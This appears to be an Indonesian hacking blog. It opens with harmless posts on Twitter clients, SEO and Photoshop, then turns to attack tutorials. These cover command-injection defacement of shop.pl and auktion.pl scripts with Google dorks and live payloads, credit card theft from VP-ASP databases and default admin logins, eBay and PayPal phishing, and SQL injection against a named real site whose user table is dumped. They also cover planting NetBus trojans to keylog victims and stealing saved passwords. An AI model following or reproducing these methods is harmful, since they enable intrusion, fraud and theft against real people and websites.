Lagu The Dark Of Life

Oops Masih secret :p
Tunggu dulu ^_^


nanti di update kok
Ini cuma buat penasaran kalian aja :D

like FP kami dulu ya ^_^
The Dark Of Life

Read More ->>

5 Aplikasi Keren Untuk Pengguna Twitter

    The Dark Of Life  ^_^

Twitter adalah salah satu jejaring sosial dan microblogging yang 3 tahun ini sedangbooming. Masyarakat Indonesia termasuk dalam pengguna Twitter terbanyak di dunia. Fenomena nge-tweet (menulis update status di Twitter) ini seakan sudah menjadi kebutuhan dan gaya hidup bagi banyak orang. Dimanapun, kapanpun, pemilik akun Twitter bisa men-update Twitter-nya dan membicarakan apapun mulai dari kabar terbaru, informasi bahkan sekedar saling sapa dengan pemilik akun Twitter lainnya.

Twitter bisa diakses melalui http://www.twitter.com dan m.twitter.com tapi website maupun versi mobile Twitter sendiri sering down dan masih terasa kurang nyaman untuk para pengguna yang sudah keranjingan pada Twitter. Karena itulah banyak bermunculanTwitter Client. Apa itu Twitter Client? Twitter Client adalah sebuah aplikasi yang berbasis web maupun untuk desktop yang dibuat agar memudahkan pengguna twitter untuk ber-twit ria dengan berbagai macam fitur, seperti : multiple account, fitur cloud trending topic, customize tabs, dan lain-lain. Ada banyak Twitter Client namun tidak semua memiliki user interface yang ramah dan navigasi yang mudah. Dibawah ini adalahreview 5 aplikasi Twitter Client yang keren, mudah dan ringan serta memiliki fitur lengkap (berbasis web ataupun desktop).

Hootsuite

Hootsuite adalah salah satu Twitter Client yang berbasis web (tidak perlu men-installaplikasi). Hootsuite ringan dan mudah di akses dengan menggunakan browser apapun. Anda dapat men-customize tab nya. Bisa hanya berisi 1 menu (home) atau 4 menu yang terdiri dari home, mention, direct message, dan reply to. Yang diperlukan untuk bisa mengakses akun Twitter Anda di Hootsuite adalah registrasi dan memiliki akun Hootsuite.

Tweetdeck

Tweetdeck merupakan salah satu pelopor Twitter Client yang berbasis web dan aplikasi (bisa diunduh dan di-install). Tweetdeck telah diakuisisi oleh Twitter dan kini menjadi milik Twitter. Kemudahan yang ditawarkan oleh Tweetdeck adalah user interface yang ramah, simple dan mudah digunakan. Untuk menggunakan Tweetdeck, lakukan registrasi dan membuat akun Tweetdeck.

Echofon

Salah satu keunggulan dari Echofon adalah memiliki Twitter Client untuk berbagaidevice dan operating system, sebut saja Echofon for Windows, Echofon for iOS dan Echofon for Android. Echofon merupakan aplikasi yang bisa didownload gratis diwebsitenya. Setelah di download, install dan masukkan pin yang akan diberikan setelahlog-in Twitter. Echofon sangat ringan untuk diakses dan memiliki tampilan yang sederhana.

Twitter for Mac

Twitter for Mac merupakan salah satu Twitter Client yang banyak digunakan oleh pengguna Mac karena ringan dan memiliki fitur yang eksklusif yaitu multiple account (satu aplikasi Twitter for Mac untuk banyak akun Twitter). Multiple account dalam Twitter for Mac sangat membantu, terlebih untuk orang-orang yang bekerja sebagai admin akun Twitter sebuah produk atau perusahaan. 

Twitscoop

Twitscoop adalah Twitter Client berbasis web. Anda tidak perlu membuat akun sepertiHootsuite atau Tweetdeck bila ingin membuka Twitter melalui Twitscoop. Cukup log-inmenggunakan username dan password Twitter Anda. Twitscoop ringan diakses dan memiliki tampilan yang sederhana dengan background warna putih dan nada cloud trending topic disisi kanannya. Twitscoope mudah digunakan dan dapat dijadikan alternatif bila website Twitter sedang susah diakses.

Penutup

Sekian ulasan mengenai Twitter Client untuk laptop/komputer dengan basis web ataupun aplikasi dengan OS Mac/Windows. Semoga bermanfaat. Ada rekomendasi Twitter Client yang lain? Let’s share here :D

Referensi : Click This :D

Down Crootz

Read More ->>

Tips SEO: 7 Hal yang Mempengaruhi Ranking di Google

The Dark Of Life

Ilmu SEO selalu menjadi bahan yang hangat untuk diperbincangkan. Dengan mempelajari SEO, kita akan dipaksa untuk terus dan terus mengupdate ilmu kita setiap hari. Hal ini seiring dengan berkembangnya teknologi mesin pencari baik yang diprakarsai oleh google maupun vendor yang lain. Namun dalam hal ini yang akan kita bicarakan masih berfokus terhadap raja mesin pencari di planet ini yaitu google.

Social graph metrics 5.30%

Perkembangan jejaring sosial dewasa ini memang hampir tak terbendung, dengan demikian peluang kita untuk promosi dan mendapatkan rekomendasi dari jejaring sosial semakin besar. SEOmoz telah memetakan pengaruh jejaring sosial terhadap ranking kita dengan nilai 5.30%. Berdasarkan nilai tersebut hendaknya kita perlu untuk meningkatkan promosi di jejaring sosial untuk menaekkan ranking kita di google. Tentu jalan satu-satunya adalah rajin-rajin sharing konten Anda di jejaring sosial 
Semakin banyak akan semakin baik. Saya contohkan hasil social graph dari facebook

Trafic + CTR  6.29%

Banyak yang berpikir bahwa lalu lintas pengunjung adalah hal yang paling dominan untuk mempengaruhi ranking di google. Tetapi hal ini dibantah oleh SEOmoz menurut apa yang disampaikan dalam gambar graphic paling atas. Ternyata pengaruhnya hanya 6.29% dari 100%.

Untuk mendapatkan lalu lintas pengunjung yang banyak  tidak bisa didapat dg instant, Anda perlu membangun jaringan yg luas, stratedi SEO yang bagus dan kejarlah keyword-keyword tertentu yang banyak pencarinya.

Registration + Hosting  6.91 %

Carilah hosting yang terpercaya, termasuk urusan keamanan harusnya jadi priotias utama. Anda tentunya tidak mau web/blog Anda disusupi malware, trojan dan sejenisnya. Untuk menambah kepercayaan terhadap pembaca maka 
lengkapilah form registrasi saat membeli hosting dan biarkan orang lain bisa melihatnya. Jangan rahasikan datanya.

On page Keyword Usage 15.04%

Yang termasuk dalam optimisasi On page adalah format penulisan h1 utk judul, h2 sub judul. Selayaknya aturan penulisan pada umumnya dimana judul ditulisan dengan heading 1 dan sub judul heading 2. Hal ini bukan saja memudahkan robot google untuk mengenali format artikel Anda, tapi juga memudahkan pembaca dalam membacanya.
On Page sangat berpengaruh besarnya terhadap hasil pencarian organik, apalgi dengan pemanfaatan teknologi semantic, mesin pencari sudah sangat cerdas untuk menganalisa dan mengindex artikel Anda.

Anchor text of external Link to the page 20.26%

Anchor text boleh juga disebut sebagai judul link/label link 
Anchor text adalah teks yg nampak dan digunakan sebagai hyperlink. Biasanya ditandai dengan tulisan berwarna biru yang apabila diklik akan membukan halam website. Peranan Anchor text sampai ke level 20.26% untuk mendongkrak ranking Anda di mesin pencari google. Jadi, jangan pernah sepelekan hal ini.

Link popularity of the specific page 22.33 %

Mempunyai banyak backlink memang sangat menguntungkan buat blog Anda. 
Tapi kualitas web yang mengarahkan linknya ke kita harus bagus. Misalkan blog dengan page rank 5 di google mengarahkan sebuah link ke kita, tentu ini akan lebih baik dengan blogpage rank 0 mengarahkan linknya ke kita dan pengaruhnya pun sangat tinggi sampai 22,33%.

Trust/Authority of the host domain 23.87 %

Belilah domain di vendor yg ternama, seperti namecheap, godaddy dan sejenisnya 
  Hindari membeli domain yg dulunya dipakai untuk hal yg tidak baik, dan untuk menghindari hal ini adalah dengan membeli domain yang baru, jangan tertarik dengan domain lama tapi telah digunakan untuk tindakan yang tidak disukai oleh manusia dan robot google.

Kesimpulan

7Hal diatas diulas berdasarkan hasil penelitian yang dilakukan tim dari SEOmoz. Jika Anda mempunyai saran atau hasil yang berbeda dari apa yang saya ulas diatas adalah merupakan sebuah bukti bahwa ilmu SEO memang tidak ada habisnya untuk didalami.

Referensi :Click This :D

Read More ->>

Membuat Efek Cermin Sederhana

The Dark Of Life

Sering mengamati foto-foto para fashion blogger atau online shop bergaya urban? Penasaran bagaimana bisa membuat satu foto terdiri dari 2 orang dengan posisi yang saling berlawanan seperti berdiri di depan cermin? Khusus pada tutorial kali ini, teknik yang digunakan sangat mudah dan sederhana. Berikut tahapan-tahapannya:

Buka file foto yang akan diedit di Adobe Photoshop. Perhatikan Layer tab, klik kanan pada layer Background (yang ada icon gembok-nya), lalu klik Layer from Backgrounddan klik OK. Sekarang layer Background menjadi layer bebas (tidak terkunci), nama “Background” bisa diubah ketika dialog box muncul sebelum mengklik OK pada saat ‘membuka kunci’ layer.

Sekarang buat area untuk refleksi atau bayangannya, mudahnya yaitu dengan membuat ukuran lebar canvas menjadi dua kali lebih besar. Klik Image > Canvas Size dan dialog box akan muncul (lihat pada gambar). Perhatikan kolom-kolom di bawah New Size, ubah satuan ukuran menjadi “percent” dan ketikkan 100 pada kolom width kemudian klik OK.

Ketika area kosong sebesar ukuran foto asli sudah siap, geser foto ke kiri atau kanan (bergantung pada di mana posisi refleksi ingin diletakkan); klik Move Tool, tekan Shiftdan klik tanda panah ke kanan/kiri di keyboard hingga gambar berada di paling ujung sisi halaman.

Pada contoh, posisi orang di foto asli dan bayangan/refleksi diposisikan saling berdekatan, oleh karena itu area di belakang model akan dihilangkan. Klik Rectangular Marquee Tool dan buat seleksi sepanjang area di belakang model lalu klik Delete (padakeyboard). Area yang ingin dihapus bisa beragam, silahkan hapus area manapun yang tidak ingin direfleksikan. Namun, bila ingin foto direfleksikan seperti aslinya, langsung saja menuju tahap berikutnya dan abaikan tahapan ini. 

Beralih ke Layer tab, klik kanan satu-satunya layer di sana dan klik Duplicate Layer. Pastikan layer duplikat yang baru saja dibuat terpilih (di-highlight abu-abu tua), klik Edit > Transform > Flip Horizontal. Layer kedua (layer duplikat) akan berbalik berlawanan dengan layer pertama. Geser (klik Move Tool dan gunakan keyboard seperti pada step-3) hingga kedua sisi bagian dalam foto bertemu dan tidak meninggalkan area kosong/transparan di tengahnya. Buat seleksi (klik Rectangular Marquee Tool) di sekeliling foto (kecuali area yang kosong/transparan), lalu klik Image > Crop.

Pastikan tidak ada area transparan yang tersisa/kelihatan. Sekarang save as hasilnya dalam format .JPEG dan hasilnya bisa dilihat pada gambar-gambar di bawah ini.

Penutup

Posisi refleksi tidak selalu saling berjajar seperti pada contoh, bisa juga atas dan bawah. Tinggal ubah saja ukuran height canvas untuk membuat area kosong tempat refleksi akan diposisikan. Selamat mencoba! :)

Referensi : Click This :D

Read More ->>

BUGS pada shop.pl && auktion.pl

1. Shop.pl Bug Bug ini seperti pada cpanel, and go bug. Lanjut ajah udah pernah koq!! a. cari target di seach engine google sementara belum ada yang mengalahkan xixixi :=) allinurl:shop.pl/page= Nah tu kan ada nggak?? Klo ada langsung aja sikat b. Tambahkan di web brosermu sebagai berikut : http://HOST/CGI_DIRECTORY/shop.pl/page=|ls| Jika hal in menunjukan list directory maka itu adalah sasaran. c. Deface kok terus, jangan dilakukan in hanya sebagai pengetahuan klean aja: http://HOST/CGI_DIRECTORY/shop.pl/page=|echo j***cuk by Satria>file.txt| Note : file.txt adalah file deface dalam bentuk txt 2. Auktion.pl Bug Langkah-langkah : a. Lelah aku nulisnya sama dengan atas cari di google allinurl:auktion.pl?menue= Klo ketemu target lanjut b. Coba sekarang tambahkan ini http://[VICTIM]/cgi-bin/auktion.pl?menue=|ID| Klo tag in menunjukkan hal aneh (apanya liat aja ndiri), maka lanjutkan ke langkah berikutnya Jika hal ini tidak mengubah tampilan maka ya cari target lain. c. Deface !! Dengan perintah echo yang sangat populer dan lawas sekali (xixixi) http://[VICTIM]/cgi-bin/auktion.pl?menue=|echo Defaced by Satria>file.txt| Contoh : http://www.1000steine.de/cgi-bin/auktion.pl?menue=;id| uid=112(100steineftp) gid=100(users) groups=100(users),111(site-adm),113(site2) nah tu kan. Lanjut http://www.1000steine.de/cgi-bin/auktion.pl?menue=;uname%20-a| Linux lagoon1.ipberlin.com 2.2.16C28_III #1 Mon Jul 30 22:07:58 PDT 2001 i586 unknown

Read More ->>

Cara Hacking CC Atau Credit Card

The Dark Of Life ^_^

Hacker kini semakin memburu nomor kartu kredit dan CVV untuk bisa berbelanja online khusunya di ebay , dan kini hacker semakin canggih dan target utama untuk hacker adalah membobol situs Paypal dimana paypal adalah alat transaksi di dunia online, jika anda ingin membeli di ebay syarat utama yang harus di penuhi adalah harus mempunyai acount Paypal (PPL). Dan kali ini saya akan posting cara Credit Card Hack.



Mari kita mulai dengan beberapa istilah yang mudah.

Apa kartu kredit?

Kartu kredit dari dua jenis:
 • Kartu Debit
 • Kartu Kredit 
1. Debit adalah untuk memiliki jumlah jumlah di dalamnya dan u dapat menggunakannya.2. Kredit berarti u memiliki batas kredit baris seperti sebesar $ 10000 dan u dapat menggunakan mereka dan dengan akhir bulan membayar ke bank.

Untuk menggunakan kartu kredit di internet u hanya tidak membutuhkan nomor cc dan kadaluwarsa tapi u perlu info banyak seperti:
• Nama 
• Nama 
• Alamat
• Kota 
• Negara
• Zip
• Negara 
• Telepon
• CC jumlah 
• Kadaluwarsa
• CVV2 (ini 3digit kode keamanan di bagian belakang setelah panel tanda tangan). Jika Anda mendapatkan info bahwa Anda dapat menggunakannya untuk membeli hal apapun di internet, seperti lisensi perangkat lunak, keanggotaan situs porno, keanggotaan proxy, atau hal (layanan online biasanya, seperti webhosting, domain).

Jika  ingin membuat uang $ melalui hacking maka Anda harus sangat beruntung ... Anda harus memiliki sebuah bank yang tepat dan bin untuk kas bahwa kartu kredit melalui mesin ATM.Mari saya jelaskan bagaimana?

Pertama mempelajari beberapa istilah sederhana.

BINS = 6 digit pertama dari setiap kartu kredit disebut "BIN" (misalnya jumlah cc adalah: 4121638430101157 kemudian bin adalah "412163"), saya harap ini mudah dipahami.

Sekarang pertanyaannya adalah bagaimana untuk menghasilkan uang melalui kartu kredit. Yang aneh ..., baik Anda cant melakukan itu, tetapi ada orang-orang tertentu di dunia yang bisa melakukan itu. Mereka menyebut diri mereka "kasir". Anda dapat mengambil beberapa waktu untuk menemukan kasir handal.Sekarang pertanyaannya adalah kartu kredit bank yang setiap cashable dan bin setiap cashable? Seperti citibank, bank america, MBNA .. semua bank cashables? Yah jawabannya adalah "TIDAK". Jika u tahu beberapa hal, hal kecil tentang sistem perbankan, telah u pernah mendengar apa yang mesin ATM? Di mana u menarik uang tunai ur dengan meletakkan kartu ur masukSetiap bank tidak memiliki ATM, setiap bank tidak mendukung ATM cashout mesin. Hanya sedikit bank mendukung dengan beberapa tempat sampah mereka (u know bin adalah 6 digit pertama dari setiap nomor kartu kredit / debit), untuk kira bank america. Bank yang tidak memiliki hanya 1 bin, bahwa bank diberikan seperti, 412345 412370 adalah sampah ur u dapat membuat kartu kredit pada mereka. Jadi bank yang membagi negara Citi lokasi bijaksana, seperti 412345-412360 adalah untuk amerika, setelah itu bagi orang luar dan seperti ini. Saya harap u mengerti. Jadi semua sampah dari bank yang sama bahkan tidak cashable, seperti untuk kira mereka mendukung ATM di New York dan tidak di California, jadi seperti tempat sampah dari California bank yang sama akan uncashable. Jadi selalu pastikan bahwa tempat sampah dan bank adalah 100% cashable di pasar dengan banyak kasir.

Pastikan kasir yang legit, karena kasir banyak r ada yang mengambil kartu kredit Anda dan merobek u off dan tidak mengirimkan share 50% kembali.Anda juga dapat menemukan beberapa kasir pada mIRC * (irc.unixirc.net / server: 6667) channel: # cashout, # ccpower

Nah, periksa situs web di mana u punya daftar tempat sampah dan bank sebagian besar 101% cashable. Jika u mendapatkan kartu kredit dari bank yang sama dengan bin sama, maka u dapat cashout jika tidak. Ingat untuk menggunakan kartu kredit di internet u tidak perlu PIN (4 kata sandi yang u masukkan dalam Mesin ATM), tapi untuk kebutuhan u cashout. Anda bisa mendapatkan pin hanya dengan Metode 2 hacking yang saya masih tidak posting tetapi saya akan. Metode pertama dari sql injection dan hacking shopadmin tidak memberikan dengan pin, hanya memberikan cc CVV2 mati rasa dan info lain yang biasanya perlu untuk belanja bukan untuk menguangkan.Hacking Kartu Kredit.

CC (Kartu Kredit) dapat hacked dengan dua cara: 
• Penipuan Kartu Kredit (biasanya digunakan untuk mendapatkan uang, beberapa kali untuk belanja)
• Kartu Kredit Shopadmin Hacking (hanya untuk menyenangkan belanja,, pengetahuan di internet)
 1. Shopadmin Hacking

Metode ini digunakan untuk menguji pengetahuan atau untuk mendapatkan kartu kredit untuk belanja di internet, atau iseng, atau cara apapun tetapi tidak untuk menguangkan (karena metode ini tidak memberikan PIN - 4 digit kode akses) hanya memberikan cc mati rasa, CVV2 dan info dasar lainnya.Shopadmins adalah dari perusahaan yang berbeda, seperti: VP-ASP, X Kereta, dll Tutorial ini untuk hacking VP-ASP TOKO.

Saya harap dilihat setiap kali u mencoba untuk membeli beberapa hal di internet dengan cc, mereka menunjukkan bentuk ua juga diprogram, sangat aman. Mereka gerobak, seperti vp-asp xcarts. Situs tertentu tidak hack, tapi gerobak yang hacked. Di bawah ini aku posting tutorial untuk hack VP ASP keranjang. Sekarang setiap situs yang menggunakan keranjang yang bisa hack, dan melalui mereka * file mdb u bisa mendapatkan 'rincian kartu kredit' klien mereka, dan juga masuk nama dan password admin area mereka, dan semua info lainnya dari klien dan rahasia company.

Mari kita mulai:

Jenis: VP-ASP Shopping CartVersi: 5.00

Bagaimana menemukan VP-ASP 5,00 situs?

Mencari VP-ASP 5,00 situs sangat sederhana ...

1. Pergi ke google.com dan ketik: VP-ASP Shopping Cart 5,002. Anda akan menemukan banyak situs dengan VP-ASP cart software 5,00 diinstalSekarang mari kita pergi ke mengeksploitasi ..

Halaman ini akan seperti ini: **** :/ / *** .victim.com / toko / shopdisplaycategories.aspMengeksploitasi adalah: diag_dbtest.aspSekarang Anda perlu melakukan ini: **** :/ / *** .victim.com / toko / diag_dbtest.asp

Sebuah halaman akan muncul yang berisi: 
• xDatabase 
• shopping140
• xDblocation 
• resx
• xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.

 Contoh:
Yang paling penting di sini adalah xDatabasexDatabase: shopping140Ok, sekarang URL akan menjadi seperti ini: **** :/ / *** .victim.com/shop/shopping140.mdbJika Anda tidak men-download Database, coba ini sementara ada dblocation:xDblocationresxurl adalah: **** :/ / *** .victim.com/shop/resx/shopping140.mdb

Download file mdb dan Anda harus dapat membukanya dengan penampil file mdb, Anda harus dapat menemukan satu di download.com, atau menggunakan MS Office Access.Di dalam Anda harus dapat menemukan informasi kartu kredit, dan Anda bahkan harus bisa menemukan username dan password admin untuk website.

Halaman login admin biasanya terletak di sini: **** :/ / *** .victim.com / toko / shopadmin.aspJika Anda tidak dapat menemukan username dan password admin di file mdb atau Anda dapat tapi itu tidak benar, atau Anda tidak dapat menemukan file mdb sama sekali, kemudian mencoba untuk menemukan halaman login admin dan memasukkan password default yaitu:
 Username: admin
 password: admin ATAU
 Username: vpasp
 password: vpasp

2. Hacking Melalui PenipuanMetode ini biasanya digunakan untuk hack untuk mendapatkan uang. Apa yang terjadi dalam metode ini adalah Anda membuat halaman klon.

Sasaran: pada dasarnya eBay.com atau paypal.com untuk kartu kredit umum, atau jika u ingin menargetkan bank manapun cashable tertentu seperti regionbank.com kemudian u harus membuat halaman klon untuk bank itu.

Apa itu eBay.com?Its situs belanja di seluruh dunia yang digunakan oleh banyak miliar orang yang menggunakan kartu kredit mereka di ebay. Apa yang Anda lakukan membuat sebuah halaman yang sama sama seperti eBay dan meng-upload di beberapa hosting yang tidak memiliki batasan hukum, mencoba untuk menemukan hosting di Eropa mereka akan membuat penipuan Anda untuk waktu yang lama, dan email pengguna eBay.

Cara mendapatkan email dari pengguna mereka?Pergi ke google.com dan ketik "Email Harvestor" atau Spider Email dan mencari Pembeli Penjual eBay dan eBay dan u akan mendapatkan daftar panjang. Bahwa daftar ini tidak akurat tetapi dari 1000 minimal 1 email akan berlaku. Atleast Anda akan mendapatkan beberapa waktu.

Nah u membuat halaman klon dari ebay, dan pesan u membuat daftar dari laba-laba dengan pesan, seperti "Account Anda telah hacked", atau alasan yang terlihat profesional, dan meminta mereka untuk mengunjungi link di bawah ini dan masukkan informasi penagihan Anda, dan halaman penipuan memiliki program ketika mereka memasuki info mereka datang langsung ke email Anda.Pada halaman formulir u memiliki PIN diperlukan agar u juga mendapatkan nomor PIN melalui mana u dapat uang tunai melalui ATM ..

Sekarang jika  jangka ebay scam atau penipuan paypal, sampai dengan keberuntungan Anda siapa korban Anda. Seorang klien dari bank amerika atau citibank atau daerah, tentang keberuntungan nya, mungkin u mendapatkan cashable, mungkin u tidak hanya keberuntungan nya, ada yang lain.Cari di google untuk men-download situs scam dan mempelajarinya!

Setelah Anda membuat situs scam Anda, hanya menemukan beberapa harvestor email atau laba-laba dari internet (download yang bagus di Superstore Software Email Massal - Pemasaran Internet Advertising Email) dan membuat daftar email yang baik.

Dan Anda perlu menemukan mailer (massa mengirim mailer) yang mengirim massa - email ke semua email dengan pesan memperbarui account mereka pada halaman penipuan ur).
Dalam dari, gunakan eBay@reply3.ebay.com email dan digunakan Judul: eBay - Update Rekening eBay Anda dan di eBay penggunaan Nama

Beberapa Petunjuk:

1. Pastikan hosting anda tetap up atau link dalam email u akan mengirim, dan ketika email korban Anda mengunjunginya, ia akan menampilkan halaman tidak dapat ditampilkan, dan rencana Anda akan gagal.

2. Titik yang paling sulit adalah mencari hosting yang tetap di scam. bahkan saya tidak menemukannya dengan mudah, bagian yang sangat sangat keras.
3. Mungkin u harus kontak dengan seseorang yang memiliki perusahaan hosting dan lokasi rekan atau dedicated ia dapat menyembunyikan penipuan Anda dalam beberapa didedikasikan tanpa pembatasan.

4. Mencari daftar email yang baik (cara yang baik = benar-benar pengguna)5. Anda massal mailing perangkat lunak tanah email di inbox pengguna.

Semoga bermanfaat..................

Penting: kartu kredit Hacking adalah tindakan ilegal, ini hanya posting informasi dan saya tidak bertanggung jawab atas tindakan yang dilakukan oleh Anda setelah membaca tutorial ini. Posting ini adalah untuk tujuan pendidikan saja.

Read More ->>

Tutorial Menggunakan schemafuzz.py

The Dark Of Life ^_^

=======================================================
Copas From : IH Team (scr34mz)


1.Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
2.Schemafuzz (http://darkc0de.com/others/schemafuzz.py)
3.CMD

Dg cmd masuk ke folder tempat schemafuzz.py berada...
Awali pertintah dengan format:
schemafuzz.py -u "url target" --perintah
List perintah ada dibawah...


1.Cari target
Misal: http://www.ditplb.or.id/profile.php?id=1

2.Masukkan perintah untuk mencari colom
Misal: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1"; --findcol
Maka keluar:
[+] URL: http://www.ditplb.or.id/profile.php?id=1--
[+]
Evasion Used: "+" "--"

[+] 20:36:29

[-] Proxy Not Given

[+] Attempting To find the number of columns...

[+] Testing: 0,1,2,
[+] Column Length is: 3

[+] Found null column at column #: 2

[+] SQLi URL:
http://www.ditplb.or.id/profile.php?...SELECT+0,1,2--

[+] darkc0de
URL: http://www.ditplb.or.id/profile.php?...T+0,1,darkc0de
[-] Done!



Berarti kita gunain
http://www.ditplb.or.id/profile.php?...T+0,1,darkc0de
untuk inject

3.Cari database dg command --dbs
Misal : schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de ";
--dbs
Maka keluar:
[+] URL:
http://www.ditplb.or.id/profile.php?...0,1,darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:39:32

[-] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: t15618_plb
User: t15618_pl...@localhost

Version: 5.0.32-Debian_7etch8

[+] Showing all databases current user has access too!

[+] Number of Databases: 1

[0] t15618_plb


[-] 20:39:39

[-] Total URL Requests 3

[-] Done


keliatan kan nama databasenya ??? t15618_plb

4.Cari nama table dalam database
Misal: schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de ";
--schema -D namadatabase
Jadinya: schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de ";
--schema -D t15618_plb
Maka keluar:

[+] URL:
http://www.ditplb.or.id/profile.php?...0,1,darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:43:10

[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...

Database: t15618_plb

User: t15618_pl...@localhost

Version: 5.0.32-Debian_7etch8
[+] Showing Tables & Columns from database "t15618_plb"
[+] Number of Tables: 11
[Database]: t15618_plb
[Table: Columns]
[0]bukutamu: id,pengirim,email,pesan
[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keteran gan
[3]frm_kategori: id_kat,kategori
[4]kabupaten: ID_kab,ID_prop,Kabupaten
[5]pelatihan: ID,Pelatihan
[6]profile: ID_Profile,sinopsis,Profile
[7]propinsi: ID_prop,Propinsi
[8]sd: ID_sd,ID_1,SD,Detail
[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
[10]user: ID_user,UserID,Password,Keterangan,Admin
[-] 20:44:39
[-] Total URL Requests 43
[-] Done

Read More ->>

Membobol komputer orang lain dengan NETBUS

The Dark Of Life ^_^

NetBus adalah program hacking karya Carl- Fredrik Neikter seorang hacker asal Swedia yang di buat dengan bahasa Delphi. Program ini dapat bekerja pada sistem operasi Windows 95/98/ Me/2000/XP dan NT. NetBus pertama kali muncul pada tahun 1998 dengan versi 1.60 kemudian keluar NetBus versi 1.70 pada tahun yang sama. Ada juga NetBus Pro v2.01 dan NetBus Pro v2.10 yang dirilis tahun 1999. Hingga saat ini, Netbus masih menjadi salah satu ancaman keamanan komputer.

Hacking dengan Netbus
Sebelum melakukan hacking, pastikan versi NetBus yang akan di gunakan. Jika menggunakan NetBus versi 1.60 atau NetBus versi 1.70, maka port yang di lacak adalah port nomor 12345. Untuk NetBus Pro versi 2.01 dan NetBus Pro v2.10, port yang di cari adalah port 20034.

Untuk menjalankan NetBus dibutuhkan 2 buah file, yaitu NetBus.exe sebesar 559.552 KB dan Patch.exe dengan kapasitas 494.592 KB. NetBus.exe merupakan file pengendali yang diletakkan di komputer kita, sedangkan Patch.exe diletakkan di komputer “korban”.

Ada beberapa cara untuk “menanam” file Patch.exe di komputer “korban”. Misalnya dengan mengirimkan sebagai attachment saat Anda mengirim email. Jika penerima email tersebut mengeksekusi file Patch.exe maka file tersebut akan ter-copy ke Folder Windows. Atau gunakan cara lain yang aman untuk menyebarkan file patch.

Tahap selanjutnya adalah menentukan host atau alamat IP yang di-hack. Untuk mencari alamat host dan IP Address yang terifeksi patch.exe, klik tombol Scan lalu klik tombol Start. Isi kotak Scan dengan IP Address awal dan kotak To dengan IP Address akhir. Tunggu beberapa saat, jika koneksi berhasil tombol Connect akan berganti menjadi tombol Cancel dan setelah itu kita bisa melakukan apa yang kita sukai, termasuk menyadap password email orang lain.

Selanjutnya, kita copy salah satu alamat IP tersebut, paste ke field Host name/IP pada jendela utama program NetBus. Klik tombol Connect. Jika user tersebut belum memutuskan koneksinya ke Internet maka kita akan melihat pesan status koneksi di jendela program NetBus yang menunjukkan sudah terhubung.

Kini kita dapat melakukan beberapa hal terhadap komputer korban. Pada NetBus tersedia sedikitnya 22 tombol, klik tombol “Active wnds” untuk melihat semua program yang sedang dijalankan orang tersebut di komputernya. Atau jika kita tertarik untuk melihat apa yang sedang diketik, maka klik tombol “Listen.” Anda akan melihat jendela seperti yang terlihat pada gambar di atas. Selanjutnya, silahkan bereksperimen sendiri dengan program ini, mudah bukan?

Download Netbus :
- Netbus 1.70
- Netbus 2.01 Pro

Antisipasi serangan Netbus
1. Update terus antivirus di computer anda, karena Netbus masuk kategori virus Trojan
2. Install sebuah firewall bernama Snort untuk mendeteksi para penyusup. Software ini bisa di peroleh secara gratis di www.snort.org
3. Pasang software proxy berbasis firewall seperti zona alarm yang bertujuan memfilter dan mengontrol semua lalu-lintas data yang masuk dan selama ini cukup dipercaya mampu melindungi komputer dari gangguan hacker atau cracker. Penjelasan tentang Zona alarm dan downloadnya di
http://www.cyberal13nated.co.cc/2010/01/download-free-koleksi-zone-alarm.html
4. Install NetBus Detective 5.2. Software ini adalah specialist pendeteksi Netbus semua versi.


Sumber : Disini

Read More ->>

Mencuri password pengguna komputer dari cookie yang tersimpan

                                             The Dark Of Life

Komputer adalah salah satu media dalam menjelajahi dunia maya. Di dalam komputer, terdapat beberapa informasi yang bisa kita pelajari terutama dalam mengungkap informasi rahasia yang tersimpan dalam computer. Salah satunya adalah username dan password yang di gunakan untuk bisa menjalankan perintah di sebuah web. Biasanya, informasi penting tersebut di simpan dalam sebuah file bernama Cookie.

Cookie adalah sebuah file berisi informasi yang di catat sebuah browser dan di simpan pada direktori khusus dalam computer. Fungsi Cookie adalah untuk mengenali pengguna ketika masuk ke sebuah situs web. Saat mengunjungi sebuah halaman internet, situs tersebut akan menggunakan informasi yang telah disimpan dalam Cookie komputer untuk menjalankan sebuah perintah.

Jumlah informasi yang disimpan dalam Cookie tersebut sangat banyak dan beragam termasuk informasi account pengguna berupa username dan password.

Dengan fungsinya yang sedemikian strategis, keberadaan Cookie menuai kontroversi dari yang mengklaim sebagai file yang berbahaya sehingga harus di matikan hingga yang mengatakan sebagai file penting yang sangat berguna. Terlepas dari pro dan kontra tersebut, tutorial berikut akan mengajak anda memahami cara menemukan username dan password dalam komputer. Jika berhasil mendapatkannya, anda bisa membayangkan sendiri apa yang selanjutnya bisa anda peroleh dari account yang tercuri tersebut.



Mengambil (mencuri) account dalam komputer dalam tutorial kali ini akan menggunakan utilitas bernama Multi Password Recovery 1.1.5 karya Alexandr Demchenko. Utilitas ini biasanya di gunakan untuk menemukan kembali password yang hilang atau terlupakan dengan salah satu tekniknya mencoba membaca informasi dalam file Cookie. Meski fungsinya sangat bagus, namun kita bisa menggunakannya untuk ikut membongkar isi file Cookie dalam menemukan account yang tersimpan.

Account yang bisa di bongkar Multi Password Recovery meliputi account FTP, Email Client, Instant Messengers dan Browsers. Dalam beberapa uji coba, Mozilla Firefox bisa lolos. Namun, masih ada cara lain membongkar informasi Cookie dari Mozilla Firefox.

Langkah-langkahnya adalah :
1. Download Multi Password Recovery 1.1.5 edisi Portable 1,3 MB di sini. Untuk versi terbaru, bisa di download di http://www.passrecovery.com/download.php
2. Ekstrak file rarnya ke sebuah folder, lalu kita masuk ke folder tempat Multi Password recovery hasil ekstrak tersimpan
